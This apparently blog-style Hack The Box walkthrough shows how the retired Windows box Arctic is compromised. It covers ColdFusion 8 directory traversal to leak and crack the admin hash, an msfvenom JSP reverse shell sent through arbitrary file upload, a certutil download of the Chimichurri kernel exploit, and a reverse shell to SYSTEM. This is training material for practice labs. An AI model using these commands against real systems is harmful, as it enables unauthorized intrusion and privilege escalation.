HTB Walkthrough: Arctic w/o Metasploit (retired)

Shraddha M.
4 min read · Apr 24, 2021


Arctic is a retired box on HTB and is part of TJ Null's list of OSCP-like boxes.

Hostname: Arctic | Difficulty Level: Easy | Operating System: Windows

NMAP Scan

┌──(kali㉿kali)-[~/labs/HTB/Arctic]
└─$ nmap -Pn -sC -sV -oA Arctic 10.10.10.11
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-14 13:25 EDT
Nmap scan report for 10.10.10.11
Host is up (0.026s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

Nmap labels port 8500 as "fmtp?" (Flight Message Transfer Protocol), but the question mark means this is only a guess from the port number. Browsing to http://10.10.10.11:8500/ reveals a web page, and browsing to any .cfc under http://10.10.10.11:8500/CFIDE/adminapi/ shows that the server is running ColdFusion (version 8), for example:
http://10.10.10.11:8500/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=/CFIDE/adminapi/administrator.cfc
This requires admin credentials. The admin portal is at http://10.10.10.11:8500/CFIDE/administrator/

┌──(kali㉿kali)-[~]
└─$ searchsploit coldfusion
Adobe ColdFusion — Directory Traversal
┌──(kali㉿kali)-[~/labs/HTB/Arctic]
└─$ searchsploit -m multiple/remote/14641.py
┌──(kali㉿kali)-[~/labs/HTB/Arctic]
└─$ cp 14641.py pass.py
┌──(kali㉿kali)-[~/labs/HTB/Arctic]
└─$ python pass.py 10.10.10.11 8500 ../../../../../../../lib/password.properties
trying /CFIDE/administrator/enter.cfm

title from server in /CFIDE/administrator/enter.cfm:
— — — — — — — — — — — — — — —
#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
— — — — — — — — — — — — — — —

The password is hashed. For more detail, the start of the script shows the complete GET request it sends to retrieve the file.
Browse to http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

You will see the same password output. View the page source to check for information about the hash algorithm:
<form name="loginform" action="/CFIDE/administrator/enter.cfm" method="POST" onSubmit="cfadminPassword.value = hex_hmac_sha1(salt.value, hex_sha1(cfadminPassword.value));" >
The form hashes the password with SHA-1 before submitting it, so let us try to look up the SHA-1 hash on https://hashtoolkit.com
Recovered password: happyday
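As an added example (not part of the original post), the following Python parses the password.properties lines shown above and confirms that the stored value is a plain, unsalted SHA-1 of the recovered password, which is exactly why a public lookup table can reverse it; the client-side HMAC with a salt only protects the value in transit, not at rest. PASSWORD_PROPERTIES is a constructed copy of the output above, and the parser handles only the line shapes shown there.

```python
import hashlib

# Constructed copy of the password.properties content shown in the walkthrough.
PASSWORD_PROPERTIES = r"""#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP \n
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
"""


def parse_properties(text):
    """Minimal key=value parser for the lines shown ('#' starts a comment).
    It does not implement full Java .properties escape handling."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def sha1_hex(password):
    """hex_sha1(...) from the login form: unsalted SHA-1 of the plaintext."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def stored_hash_matches(candidate, stored_hex):
    """True when the stored value is exactly SHA-1(candidate). No per-user
    salt is mixed in, so the same password always yields the same hash."""
    return sha1_hex(candidate).lower() == stored_hex.lower()


def check_candidate(candidate, properties_text=PASSWORD_PROPERTIES):
    """Parse the properties file and test one candidate password against it."""
    props = parse_properties(properties_text)
    stored = props.get("password", "")
    return {
        "encrypted_flag": props.get("encrypted"),
        "stored": stored,
        "matches": stored_hash_matches(candidate, stored),
    }


if __name__ == "__main__":
    print(check_candidate("happyday"))
```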
If you log in to http://10.10.10.11:8500/CFIDE/administrator with the 'happyday' password, you will get in. There are other ways to exploit the admin portal, but I instead used the method below using searchsploit.

Searchsploit lists ColdFusion 8.0 as vulnerable to arbitrary file upload ('Adobe ColdFusion 2018 - Arbitrary File Upload'), though no script is included with the entry. The script is available at the link below:
https://forum.hackthebox.eu/discussion/116/python-coldfusion-8-0-1-arbitrary-file-upload

Generate a reverse shell using: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP> LPORT=9876 > shell.jsp

┌──(kali㉿kali)-[~/labs/HTB/Arctic]
└─$ python rev.py 10.10.10.11 8500 shell.jsp

/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Sending payload…
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploit.jsp

Open a netcat listener on Kali (port 9876). Browse to http://10.10.10.11:8500/userfiles/file/exploit.jsp and you will get a reverse shell.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis

On the target machine, run the 'systeminfo' command. Save the output on Kali (systeminfo.txt).

┌──(kali㉿kali)-[~/labs/HTB/opt]
└─$ ./windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2021-04-20-mssb.xls
[*] done

Note: install the dependency below first
┌──(kali㉿kali)-[~/labs/HTB/opt]
└─$ pip install xlrd==1.2.0

┌──(kali㉿kali)-[~/labs/HTB/opt]
└─$ ./windows-exploit-suggester.py --systeminfo ~/labs/HTB/Arctic/systeminfo.txt -d 2021-04-20-mssb.xls

[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ - Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ - Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important

The MS11-011 exploit did not work for me. There is no MS10-059 exploit in searchsploit. I found the exploit at https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe and renamed the file to 'exploit.exe'. [Note: You should not be running any file whose source code you cannot read.]
Transferring the file to the target machine:
C:\Users\tolis\Documents>certutil -urlcache -f "http://<Kali IP>:8000/exploit.exe" exploit.exe

Run the exploit:
C:\Users\tolis\Documents>exploit.exe
exploit.exe
/Chimichurri/ →This exploit gives you a Local System shell <BR>/Chimichurri/ →Usage: Chimichurri.exe ipaddress port <BR>

Open a netcat listener on Kali (in another window) on port 9987.

C:\Users\tolis\Documents>exploit.exe <Kali IP> 9987
exploit.exe 10.10.XX.XX 9987
/Chimichurri/ →This exploit gives you a Local System shell <BR>/Chimichurri/ →Changing registry values…<BR>/Chimichurri/ →Got SYSTEM token…<BR>/Chimichurri/ →Running reverse shell…<BR>/Chimichurri/ →Restoring default registry values…<BR>

You should get a reverse shell.
C:\Users\tolis\Documents>whoami
whoami
nt authority\system
